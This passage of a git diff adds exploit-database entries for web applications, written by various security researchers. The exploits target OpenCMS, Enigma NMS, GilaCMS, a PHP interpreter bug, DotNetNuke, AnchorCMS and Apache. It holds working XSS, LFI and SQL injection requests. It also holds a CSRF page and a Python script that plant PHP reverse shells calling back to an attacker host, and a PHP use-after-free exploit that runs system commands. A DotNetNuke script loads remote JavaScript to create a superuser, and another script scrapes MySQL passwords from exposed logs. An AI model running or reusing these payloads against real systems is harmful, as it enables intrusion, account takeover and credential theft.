+POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1
+Host: example.com
+------WebKitFormBoundaryLyJOmAtrd8ArxNqf
+Content-Disposition: form-data; name="inputDir.0"
+.
+------WebKitFormBoundaryLyJOmAtrd8ArxNqf
+Content-Disposition: form-data; name="destinationDir.0"
+/whbo0"><script>alert(1)</script>nrbhd
+------WebKitFormBoundaryLyJOmAtrd8ArxNqf
+Content-Disposition: form-data; name="imageGallery.0"
+------WebKitFormBoundaryLyJOmAtrd8ArxNqf
+Content-Disposition: form-data; name="downloadGallery.0"
+------WebKitFormBoundaryLyJOmAtrd8ArxNqf
+Content-Disposition: form-data; name="linkGallery.0"
+[...]
+```
+11. In Administrator view > Database management > Extended html import >
+Default html values (Reflected XSS):
+- Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and
+downloadGallery.0:
+POC:
+```
+POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1
+Host: example.com
+------WebKitFormBoundary6fy3ENawtXT0qmgB
+Content-Disposition: form-data; name="inputDir.0"
+gato
+------WebKitFormBoundary6fy3ENawtXT0qmgB
+Content-Disposition: form-data; name="destinationDir.0"
+testszfgw"><script>alert(1)</script>vqln7
+------WebKitFormBoundary6fy3ENawtXT0qmgB
+Content-Disposition: form-data; name="imageGallery.0"
+test
+------WebKitFormBoundary6fy3ENawtXT0qmgB
+Content-Disposition: form-data; name="downloadGallery.0"
+test
+------WebKitFormBoundary6fy3ENawtXT0qmgB
+Content-Disposition: form-data; name="linkGallery.0"
+test
+[...]
+```
+
+
+Extended POCs: https://aetsu.github.io/OpenCms
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47340.txt b/exploits/multiple/webapps/47340.txt
new file mode 100644
index 000000000..141964741
--- /dev/null
+++ b/exploits/multiple/webapps/47340.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms
+Site Management
+# Google Dork: N/A
+# Date: 18/07/2019
+# Exploit Author: Aetsu
+# Vendor Homepage: http://www.opencms.org
+# Software Link: https://github.com/alkacon/opencms-core
+# Version: 10.5.x
+# Tested on: 10.5.5 / 10.5.4
+# CVE : CVE-2019-13237
+
+For the tests, I used the payloads:
+```
+…%2f…%2fWEB-INF%2flogs%2fopencms.log
+…%2f…%2fWEB-INF%2fweb.xml
+```
+
+1. Affected resource closelink:
+POC:
+```
+POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
+Host: example.com
+enabled.0=true&enabled.0.value=true&message.0=%3Cimg+src%3D.+onerror%3Dalert%281%29%3E%0D%0A&loginForbidden.0.value=false&timeStart.0=1%2F3%2F2000+12%3A00+AM&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
+```
+2. Affected resource closelink:
+POC:
+```
+POST /system/workplace/admin/contenttools/reports/xmlcontentrepair.jsp
+HTTP/1.1
+Host: example.com
+reporttype=extended&reportcontinuekey=&thread=dcbb6737-661b-11e9-a9fc-0242ac11002b&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=Ok
+```
+3. Affected resource closelink:
+POC:
+```
+POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
+Host: example.com
+name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27%29%3E&assignedOu.0=root+organizational+unit+%28%2F%29&enabled.0=true&enabled.0.value=true&ok=Ok&oufqn=&elementname=undefined&path=%252Faccounts%252Forgunit%252Fgroups%252Fnew&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
+```
+4. Affected resource closelink:
+POC:
+```
+POST /system/workplace/admin/history/settings/index.jsp HTTP/1.1
+Host: example.com
+versions.0=10&mode.0=2&ok=OK&elementname=undefined&path=%252Fhistory%252Fsettings&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
+```
+5. Affected resource closelink:
+POC:
+```
+POST /system/workplace/admin/history/reports/clearhistory.jsp HTTP/1.1
+Host: example.com
+reporttype=extended&reportcontinuekey=&thread=ac0bbd5f-66cd-11e9-ae09-0242ac11002b&classname=org.opencms.workplace.tools.history.CmsHistoryClearDialog&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=OK
+```
+
+
+Extended POCs: https://aetsu.github.io/OpenCms
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47363.html b/exploits/multiple/webapps/47363.html
new file mode 100644
index 000000000..053c7c172
--- /dev/null
+++ b/exploits/multiple/webapps/47363.html
@@ -0,0 +1,69 @@
+#--------------------------------------------------------------------#
+# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF)        #
+# Date:  21 July 2019                                                #
+# Author: Mark Cross (@xerubus | mogozobo.com)                       #
+# Vendor: NETSAS Pty Ltd                                             #
+# Vendor Homepage:  https://www.netsas.com.au/                       #
+# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
+# Version: Enigma NMS 65.0.0                                         #
+# CVE-IDs: CVE-2019-16068                                            #   
+# Full write-up: https://www.mogozobo.com/?p=3647                    #
+#--------------------------------------------------------------------#
+        _  _
+  ___ (~ )( ~)
+ /   \_\ \/ /   
+|   D_ ]\ \/        -= Enigma CSRF by @xerubus =-       
+|   D _]/\ \     -= We all have something to hide =-
+ \___/ / /\ \\
+      (_ )( _)
+      @Xerubus    
+
+The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.
+
+<html>
+  <script>history.pushState('', '', '/')</script>
+  <script>
+    function submitRequest()
+    {
+      var xhr = new XMLHttpRequest();
+      xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true);
+      xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+      xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495");
+      xhr.withCredentials = true;
+
+      var body = "-----------------------------208051173310446317141640314495\r\n" + 
+        "Content-Disposition: form-data; name=\"action\"\r\n" + 
+        "\r\n" + 
+        "system_upgrade\r\n" + 
+        "-----------------------------208051173310446317141640314495\r\n" + 
+        "Content-Disposition: form-data; name=\"action_aux\"\r\n" + 
+        "\r\n" + 
+        "upload_file_complete\r\n" + 
+        "-----------------------------208051173310446317141640314495\r\n" + 
+        "Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" + 
+        "Content-Type: application/x-php\r\n" + 
+        "\r\n" + 
+        "\x3c?php\n" + 
+        "\n" + 
+        "exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" + 
+        "\n" + 
+        "?\x3e\n" + 
+        "\r\n" + 
+        "-----------------------------208051173310446317141640314495\r\n" + 
+        "Content-Disposition: form-data; name=\"upfile_name\"\r\n" + 
+        "\r\n" + 
+        "evil.php\r\n" + 
+        "-----------------------------208051173310446317141640314495--\r\n";
+
+      var aBody = new Uint8Array(body.length);
+      for (var i = 0; i < aBody.length; i++)
+        aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+    }
+    submitRequest();
+    window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
+  </script>
+  <body onload="submitRequest();" >
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47364.py b/exploits/multiple/webapps/47364.py
new file mode 100755
index 000000000..db743e07b
--- /dev/null
+++ b/exploits/multiple/webapps/47364.py
@@ -0,0 +1,66 @@
+#!/usr/bin/python
+#--------------------------------------------------------------------#
+# Exploit Title: Enigma NMS OS Command Injection                     #
+# NETSAS Pty Ltd Enigma NMS                                          #
+# Date:  21 July 2019                                                #
+# Author: Mark Cross (@xerubus | mogozobo.com)                       #
+# Vendor: NETSAS Pty Ltd                                             #
+# Vendor Homepage:  https://www.netsas.com.au/                       #
+# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
+# Version: Enigma NMS 65.0.0                                         #
+# CVE-IDs: CVE-2019-16072                                            #
+# Full write-up: https://www.mogozobo.com/?p=3647                    #
+#--------------------------------------------------------------------#
+
+import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading
+
+os.system('clear')
+
+print("""\
+        _  _
+  ___ (~ )( ~)
+ /   \_\ \/ /   
+|   D_ ]\ \/  -= Enigma NMS Reverse Shell by @xerubus =-    
+|   D _]/\ \     -= We all have something to hide =-
+ \___/ / /\ \\
+      (_ )( _)
+      @Xerubus    
+                    """)
+
+enigma_host = raw_input("Enter Enigma NMS IP address:\t")
+attack_host = raw_input("Enter Attacker IP address:\t")
+rev_sh_port = raw_input("Enter reverse shell port:\t")
+web_svr_port = raw_input("Enter web server port:\t\t")
+user = raw_input("Enter Username:\t\t\t")
+os.system("stty -echo")
+password = raw_input("Enter Password (no echo):\t")
+os.system("stty echo")
+	
+enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
+enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+
+print "\n\n[+] Building PHP reverse shell"
+f=open("evil.php","w")
+f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n")
+f.close()
+
+# Create simple webserver hosting evil php file
+print "[+] Hosting PHP reverse shell"
+web_svr_port = str(web_svr_port)
+web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid)
+
+# Create netcat listener
+print "[+] Creating listener on port " + rev_sh_port
+subprocess.Popen(["nc", "-nvlp", rev_sh_port])
+
+# Send payload to Enigma NMS
+print "[+] Sending payload\n"
+try:
+    r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password))
+except:
+    pass
+
+print "\n[+] Cleaning up mess..." 
+
+# Shut down http server
+os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47365.txt b/exploits/multiple/webapps/47365.txt
new file mode 100644
index 000000000..0cb61aaa9
--- /dev/null
+++ b/exploits/multiple/webapps/47365.txt
@@ -0,0 +1,23 @@
+#--------------------------------------------------------------------#
+# Exploit Title: Enigma NMS search_pattern SQL Injection             #
+# Date:  21 July 2019                                                #
+# Author: Mark Cross (@xerubus | mogozobo.com)                       #
+# Vendor: NETSAS Pty Ltd                                             #
+# Vendor Homepage:  https://www.netsas.com.au/                       #
+# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
+# Version: Enigma NMS 65.0.0                                         #
+# CVE-IDs: CVE-2019-16065                                            #
+# Full write-up: https://www.mogozobo.com/?p=3647                    #
+#--------------------------------------------------------------------#
+        _  _
+  ___ (~ )( ~)
+ /   \_\ \/ /   
+|   D_ ]\ \/        -= Enigma SQLi by @xerubus =-    
+|   D _]/\ \     -= We all have something to hide =-
+ \___/ / /\ \\
+      (_ )( _)
+      @Xerubus    
+
+Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern=
+Vulnerable Parameter:  search_pattern (GET)
+Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47407.txt b/exploits/multiple/webapps/47407.txt
new file mode 100644
index 000000000..752ca3030
--- /dev/null
+++ b/exploits/multiple/webapps/47407.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS
+# Google Dork: N/A
+# Date: 04-08-2019
+# Exploit Author: Sainadh Jamalpur
+# Vendor Homepage: https://github.com/GilaCMS/gila
+# Software Link: https://github.com/GilaCMS/gila
+# Version: 1.10.9
+# Tested on: XAMPP version 3.2.2 in Windows 10 64bit,
+# CVE : CVE-2019-16679
+
+*********** *Steps to reproduce the Vulnerability* *************
+
+Login into the application as an admin user or equivalent user and go the
+below link
+
+http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts
+
+################################################################
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47446.php b/exploits/multiple/webapps/47446.php
new file mode 100644
index 000000000..ab823fb37
--- /dev/null
+++ b/exploits/multiple/webapps/47446.php
@@ -0,0 +1,253 @@
+<?php
+
+$cmd = "id";
+
+$n_alloc = 10; # increase this value if you get segfaults
+
+class MySplFixedArray extends SplFixedArray {
+    public static $leak;
+}
+
+class Z implements JsonSerializable {
+    public function write(&$str, $p, $v, $n = 8) {
+      $i = 0;
+      for($i = 0; $i < $n; $i++) {
+        $str[$p + $i] = chr($v & 0xff);
+        $v >>= 8;
+      }
+    }
+
+    public function str2ptr(&$str, $p = 0, $s = 8) {
+        $address = 0;
+        for($j = $s-1; $j >= 0; $j--) {
+            $address <<= 8;
+            $address |= ord($str[$p+$j]);
+        }
+        return $address;
+    }
+
+    public function ptr2str($ptr, $m = 8) {
+        $out = "";
+        for ($i=0; $i < $m; $i++) {
+            $out .= chr($ptr & 0xff);
+            $ptr >>= 8;
+        }
+        return $out;
+    }
+
+    # unable to leak ro segments
+    public function leak1($addr) {
+        global $spl1;
+
+        $this->write($this->abc, 8, $addr - 0x10);
+        return strlen(get_class($spl1));
+    }
+
+    # the real deal
+    public function leak2($addr, $p = 0, $s = 8) {
+        global $spl1, $fake_tbl_off;
+
+        # fake reference zval
+        $this->write($this->abc, $fake_tbl_off + 0x10, 0xdeadbeef); # gc_refcounted
+        $this->write($this->abc, $fake_tbl_off + 0x18, $addr + $p - 0x10); # zval
+        $this->write($this->abc, $fake_tbl_off + 0x20, 6); # type (string)
+
+        $leak = strlen($spl1::$leak);
+        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
+
+        return $leak;
+    }
+
+    public function parse_elf($base) {
+        $e_type = $this->leak2($base, 0x10, 2);
+
+        $e_phoff = $this->leak2($base, 0x20);
+        $e_phentsize = $this->leak2($base, 0x36, 2);
+        $e_phnum = $this->leak2($base, 0x38, 2);
+
+        for($i = 0; $i < $e_phnum; $i++) {
+            $header = $base + $e_phoff + $i * $e_phentsize;
+            $p_type  = $this->leak2($header, 0, 4);
+            $p_flags = $this->leak2($header, 4, 4);
+            $p_vaddr = $this->leak2($header, 0x10);
+            $p_memsz = $this->leak2($header, 0x28);
+
+            if($p_type == 0x6474e552) { # PT_GNU_RELRO
+                # handle pie
+                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
+                $data_size = $p_memsz;
+            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
+                $text_size = $p_memsz;
+            }
+        }
+
+        if(!$data_addr || !$text_size || !$data_size)
+            return false;
+
+        return [$data_addr, $text_size, $data_size];
+    }
+
+    public function get_basic_funcs($base, $elf) {
+        list($data_addr, $text_size, $data_size) = $elf;
+        for($i = 0; $i < $data_size / 8; $i++) {
+            $leak = $this->leak2($data_addr, $i * 8);
+            if($leak - $base > 0 && $leak - $base < $text_size) {
+                $deref = $this->leak2($leak);
+                # 'constant' constant check
+                if($deref != 0x746e6174736e6f63)
+                    continue;
+            } else continue;
+
+            $leak = $this->leak2($data_addr, ($i + 4) * 8);
+            if($leak - $base > 0 && $leak - $base < $text_size) {
+                $deref = $this->leak2($leak);
+                # 'bin2hex' constant check
+                if($deref != 0x786568326e6962)
+                    continue;
+            } else continue;
+
+            return $data_addr + $i * 8;
+        }
+    }
+
+    public function get_binary_base($binary_leak) {
+        $base = 0;
+        $start = $binary_leak & 0xfffffffffffff000;
+        for($i = 0; $i < 0x1000; $i++) {
+            $addr = $start - 0x1000 * $i;
+            $leak = $this->leak2($addr, 0, 7);
+            if($leak == 0x10102464c457f) { # ELF header
+                return $addr;
+            }
+        }
+    }
+
+    public function get_system($basic_funcs) {
+        $addr = $basic_funcs;
+        do {
+            $f_entry = $this->leak2($addr);
+            $f_name = $this->leak2($f_entry, 0, 6);
+
+            if($f_name == 0x6d6574737973) { # system
+                return $this->leak2($addr + 8);
+            }
+            $addr += 0x20;
+        } while($f_entry != 0);
+        return false;
+    }
+
+    public function jsonSerialize() {
+        global $y, $cmd, $spl1, $fake_tbl_off, $n_alloc;
+
+        $contiguous = [];
+        for($i = 0; $i < $n_alloc; $i++)
+            $contiguous[] = new DateInterval('PT1S');
+
+        $room = [];
+        for($i = 0; $i < $n_alloc; $i++)
+            $room[] = new Z();
+
+        $_protector = $this->ptr2str(0, 78);
+
+        $this->abc = $this->ptr2str(0, 79);
+        $p = new DateInterval('PT1S');
+
+        unset($y[0]);
+        unset($p);
+
+        $protector = ".$_protector";
+
+        $x = new DateInterval('PT1S');
+        $x->d = 0x2000;
+        $x->h = 0xdeadbeef;
+        # $this->abc is now of size 0x2000
+
+        if($this->str2ptr($this->abc) != 0xdeadbeef) {
+            die('UAF failed.');
+        }
+
+        $spl1 = new MySplFixedArray();
+        $spl2 = new MySplFixedArray();
+
+        # some leaks
+        $class_entry = $this->str2ptr($this->abc, 0x120);
+        $handlers = $this->str2ptr($this->abc, 0x128);
+        $php_heap = $this->str2ptr($this->abc, 0x1a8);
+        $abc_addr = $php_heap - 0x218;
+
+        # create a fake class_entry
+        $fake_obj = $abc_addr;
+        $this->write($this->abc, 0, 2); # type
+        $this->write($this->abc, 0x120, $abc_addr); # fake class_entry
+
+        # copy some of class_entry definition
+        for($i = 0; $i < 16; $i++) {
+            $this->write($this->abc, 0x10 + $i * 8, 
+                $this->leak1($class_entry + 0x10 + $i * 8));
+        }
+
+        # fake static members table
+        $fake_tbl_off = 0x70 * 4 - 16;
+        $this->write($this->abc, 0x30, $abc_addr + $fake_tbl_off);
+        $this->write($this->abc, 0x38, $abc_addr + $fake_tbl_off);
+
+        # fake zval_reference
+        $this->write($this->abc, $fake_tbl_off, $abc_addr + $fake_tbl_off + 0x10); # zval
+        $this->write($this->abc, $fake_tbl_off + 8, 10); # zval type (reference)
+
+        # look for binary base
+        $binary_leak = $this->leak2($handlers + 0x10);
+        if(!($base = $this->get_binary_base($binary_leak))) {
+            die("Couldn't determine binary base address");
+        }
+
+        # parse elf header
+        if(!($elf = $this->parse_elf($base))) {
+            die("Couldn't parse ELF");
+        }
+
+        # get basic_functions address
+        if(!($basic_funcs = $this->get_basic_funcs($base, $elf))) {
+            die("Couldn't get basic_functions address");
+        }
+
+        # find system entry
+        if(!($zif_system = $this->get_system($basic_funcs))) {
+            die("Couldn't get zif_system address");
+        }
+        
+        # copy hashtable offsetGet bucket
+        $fake_bkt_off = 0x70 * 5 - 16;
+
+        $function_data = $this->str2ptr($this->abc, 0x50);
+        for($i = 0; $i < 4; $i++) {
+            $this->write($this->abc, $fake_bkt_off + $i * 8, 
+                $this->leak2($function_data + 0x40 * 4, $i * 8));
+        }
+
+        # create a fake bucket
+        $fake_bkt_addr = $abc_addr + $fake_bkt_off;
+        $this->write($this->abc, 0x50, $fake_bkt_addr);
+        for($i = 0; $i < 3; $i++) {
+            $this->write($this->abc, 0x58 + $i * 4, 1, 4);
+        }
+
+        # copy bucket zval
+        $function_zval = $this->str2ptr($this->abc, $fake_bkt_off);
+        for($i = 0; $i < 12; $i++) {
+            $this->write($this->abc,  $fake_bkt_off + 0x70 + $i * 8, 
+                $this->leak2($function_zval, $i * 8));
+        }
+
+        # pwn
+        $this->write($this->abc, $fake_bkt_off + 0x70 + 0x30, $zif_system);
+        $this->write($this->abc, $fake_bkt_off, $fake_bkt_addr + 0x70);
+
+        $spl1->offsetGet($cmd);
+
+        exit();
+    }
+}
+
+$y = [new Z()];
+json_encode([&$y]);
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47448.py b/exploits/multiple/webapps/47448.py
new file mode 100755
index 000000000..cffe2289b
--- /dev/null
+++ b/exploits/multiple/webapps/47448.py
@@ -0,0 +1,124 @@
+# Exploit Title: Stored Cross-Site Scripting in DotNetNuke (DNN) Version before 9.4.0
+# Exploit Description : This exploit will add a superuser to target DNN website. 
+# Exploit Condition : Successful exploitation occurs when an admin user visits a notification page.
+# Exploit Author: MAYASEVEN
+# CVE : CVE-2019-12562 (https://www.cvedetails.com/cve/CVE-2019-12562/)
+# Github : https://github.com/MAYASEVEN/CVE-2019-12562
+# Website : https://mayaseven.com
+
+import urllib.request
+from bs4 import BeautifulSoup
+
+####################################################################################################
+################################## Config the variables here #######################################
+####################################################################################################
+TARGET_URL = "http://targetdomain/DotNetNuke"
+USERNAME = "MAYASEVEN"   # At least five characters long
+PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
+EMAIL = "research@mayaseven.com" # Change email to any you want
+# A web server for listening an event
+LISTEN_URL = "http://yourdomain.com:1337"
+#####################################################################################################
+#####################################################################################################
+#####################################################################################################
+
+# Payload to add a superuser to website
+PAYLOAD = "John<script src='"+LISTEN_URL+"/payload.js'></script>"
+FILE_CONTENT = """var token = document.getElementsByName("__RequestVerificationToken")[0].value;
+var xhttp = new XMLHttpRequest();
+var params = "{'firstName':'"""+USERNAME+"""','lastName':'"""+USERNAME+"""','email':'"""+EMAIL+"""','userName':'"""+USERNAME+"""','password':'"""+PASSWORD+"""','question':'','answer':'','randomPassword':false,'authorize':true,'notify':false}";
+xhttp.onreadystatechange = function() {
+    if (this.readyState == 4 && this.status == 200) {
+        var returnhttp1 = new XMLHttpRequest();
+        returnhttp1.open("GET", '"""+LISTEN_URL+"""/Added_the_user');
+        returnhttp1.send();
+        var xhttp2 = new XMLHttpRequest();
+        var userId = JSON.parse(xhttp.responseText).userId;
+        xhttp2.onreadystatechange = function() {
+            if (this.readyState == 4 && this.status == 200) {
+                var returnhttp2 = new XMLHttpRequest();
+                returnhttp2.open("GET", '"""+LISTEN_URL+"""/Make_superuser_success');
+                returnhttp2.send();
+            }
+        }
+        xhttp2.open('POST', '"""+TARGET_URL+"""/API/PersonaBar/Users/UpdateSuperUserStatus?userId='+userId+'&setSuperUser=true', true);
+        xhttp2.setRequestHeader('Content-type', 'application/json; charset=UTF-8');
+        xhttp2.setRequestHeader('RequestVerificationToken', token);
+        xhttp2.send(params);
+    }
+};
+xhttp.open('POST', '"""+TARGET_URL+"""/API/PersonaBar/Users/CreateUser', true);
+xhttp.setRequestHeader('Content-type', 'application/json; charset=UTF-8');
+xhttp.setRequestHeader('RequestVerificationToken', token);
+xhttp.send(params);
+"""
+
+def create_payload():
+    # Create a payload.js file
+    f = open("payload.js", "w")
+    f.write(FILE_CONTENT)
+    f.close()
+
+def check_target():
+    global regpage
+    reg = urllib.request.urlopen(TARGET_URL+"/Register")
+    regpage = reg.read().decode("utf8")
+    reg.close()
+    if "dnn" in regpage:
+       return True
+    else: return False
+
+def exploit():
+    # Fetching parameter from regpage
+    soup = BeautifulSoup(regpage, 'html.parser')
+    formhtml = soup.find("div", {"id": "dnn_ctr_Register_userForm"})
+    inputdata = BeautifulSoup(regpage, 'html.parser').findAll("input")
+    param = {}
+    print(" [+] Fetching DNN random parameter name.")
+    for i in soup.select('input[name*="_TextBox"]'):
+        print(" [+]", i["aria-label"],":", i["name"])
+        param[i["aria-label"]] = i["name"]
+    ScriptManager = "dnn$ctr$Register_UP|dnn$ctr$Register$registerButton"
+    __EVENTVALIDATION = soup.find("input", {"id": "__EVENTVALIDATION"})["value"]
+    __VIEWSTATE = soup.find("input", {"id": "__VIEWSTATE"})["value"]
+    __EVENTTARGET = "dnn$ctr$Register$registerButton"
+
+    # Posting data to target
+    headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8'}
+    data = {'ScriptManager': ScriptManager, '__EVENTVALIDATION': __EVENTVALIDATION, '__VIEWSTATE': __VIEWSTATE, '__EVENTTARGET': __EVENTTARGET,
+        param['Username']: "dummy_"+USERNAME, param["Password"]: PASSWORD, param["PasswordConfirm"]: PASSWORD, param["DisplayName"]: PAYLOAD, "dummy_"+param["Email"]: EMAIL, '__ASYNCPOST': 'true'}
+    data = urllib.parse.urlencode(data).encode()
+    req = urllib.request.Request(TARGET_URL+"/Register", data=data, headers=headers)
+    response = urllib.request.urlopen(req)
+    if "An email with your details has been sent to the Site Administrator" in response.read().decode("utf8"):
+        create_payload()
+        return True
+    elif "A user already exists" in response.read().decode("utf8"):
+        print(" [!] The user already exists")
+        return False 
+    elif "The Display Name is invalid." in response.read().decode("utf8"):
+        print(" [!] DotNetNuke verion already been patched")
+    else: return False
+
+def main():
+    print("[ Checking the target ]")
+    if(check_target()):
+        print(" [+] Target is DNN website.")
+        print(" [+] URL: %s" % TARGET_URL)
+    else:
+        print(" [!] Target is not DNN website and exploit will not working.")
+        return
+    print("[ Running an exploit ]")
+    if(exploit()):
+        print("[ Successful exploited the target ]")
+        print("> Creating a payload.js file in current directory.")
+        print("> You have to serve the web server and place payload.js on it.")
+        print("> And waiting admin to open a notification then the user will be added.")
+        print("> Username: %s" % USERNAME)
+        print("> Password: %s" % PASSWORD)
+    else:
+        print(" [!] Failed to exploit the target.")
+        return
+
+if(__name__ == "__main__"):
+    main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47459.py b/exploits/multiple/webapps/47459.py
new file mode 100755
index 000000000..dace0ffe3
--- /dev/null
+++ b/exploits/multiple/webapps/47459.py
@@ -0,0 +1,68 @@
+# Exploit Title: Information disclosure (MySQL password) in error log
+# Date: 2/10/2019
+# Exploit Author: Tijme Gommers (https://twitter.com/finnwea/)
+# Vendor Homepage: https://anchorcms.com/
+# Software Link: https://github.com/anchorcms/anchor-cms/releases
+# Version: 0.12.3a
+# Tested on: Linux
+# CVE : CVE-2018-7251
+
+# By default, AnchorCMS will log errors to the "/anchor/errors.log" file in the webroot of the web application. This allows malicious users to access the error log and view potentally sensitive information. Sometimes the AnchorCMS error log contains ocurrences of the MySQL error "Can't connect to MySQL server on 'xxx.xxx.xxx.xxx' (111)". When this error occurs the variables of the MySQL connector class are serialized into a JSON object and logged to the error log.
+
+import re
+import sys
+import importlib
+
+
+def get_plain(url):
+    try:
+        plain_result = requests.get(url=url)
+        return plain_result
+    except:
+        return None
+
+
+def print_usage():
+    print('Usage: {0} <url>'.format(__file__))
+
+
+if __name__ == '__main__':
+
+    # Ensure we have the URL
+    if len(sys.argv) != 2:
+        print_usage()
+        sys.exit(1)
+
+    print("* Using AnchorCMS website: " + sys.argv[1])
+
+    print("* Trying to import 'requests' module")
+    requests_loader = importlib.util.find_spec('requests')
+    requests_module_found = requests_loader is not None
+
+    if requests_module_found:
+        import requests
+    else:
+        print("* 'requests' module not found, please install it using pip")
+        print("* pip install requests")
+        sys.exit(1)
+
+    json_url = sys.argv[1].strip("/") + "/anchor/errors.log"
+    print("* Trying to get errors.log file at: {}".format(json_url))
+    plain_result = get_plain(json_url)
+
+    if plain_result == None:
+        print("* URL could not be requested, errors.log is probably not exposed")
+        sys.exit(1)
+
+    print("* Found data {}, trying to parse it now".format(plain_result))
+
+    lines = re.findall(r'"line":\d', plain_result.text)
+
+    print("* Found {} error entries".format(len(lines)))
+
+    passwords = re.findall(r'\[([^\[\]]*)"password"([^\[\]]*)\]', plain_result.text)
+
+    print("* Found {} passwords entries".format(len(passwords)))
+
+    for password in passwords:
+        print("+ {}".format(password))
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47688.md b/exploits/multiple/webapps/47688.md
new file mode 100644
index 000000000..993eb8163
--- /dev/null
+++ b/exploits/multiple/webapps/47688.md
@@ -0,0 +1,14 @@
+The trick is to use a vertical tab (`%09`) and then place another URL in the tag. So once a victim clicks the link on the error page, she will go somewhere else.
+
+As you can see, the browser changes the destination from relative / to an absolute url https://enoflag.de. The exploit is `http://domain.tld/%09//otherdomain.tld`
+
+Here's the httpd configuration to reproduce the behavior:
+
+```
+    <Location />
+        ProxyPass http://127.0.0.1:9000/ connectiontimeout=1 timeout=2
+        ProxyPassReverse http://127.0.0.1:9000/ 
+        Order allow,deny
+        Allow from all
+    </Location>
+```
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47689.md b/exploits/multiple/webapps/47689.md
new file mode 100644
index 000000000..88a09f113
--- /dev/null
+++ b/exploits/multiple/webapps/47689.md
@@ -0,0 +1,9 @@
+Normal URLs like http://redirect.local/test will be forwared to https://redirect.local/test. But by using newlines (CVE 2019-10098), we can redirect somewhere else (i.e. to `https://redirect.local.evilwebsite.com`):
+
+```
+curl -Ik 'https://redirect.local/%0a.evilwebsite.com' --path-as-is
+HTTP/2 302 
+date: Mon, 28 Oct 2019 03:36:58 GMT
+content-type: text/html; charset=iso-8859-1
+location: https://redirect.local.evilwebsite.com
+```
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47690.md b/exploits/multiple/webapps/47690.md
new file mode 100644
index 000000000..11dc0fe34
--- /dev/null
+++ b/exploits/multiple/webapps/47690.md
@@ -0,0 +1,10 @@
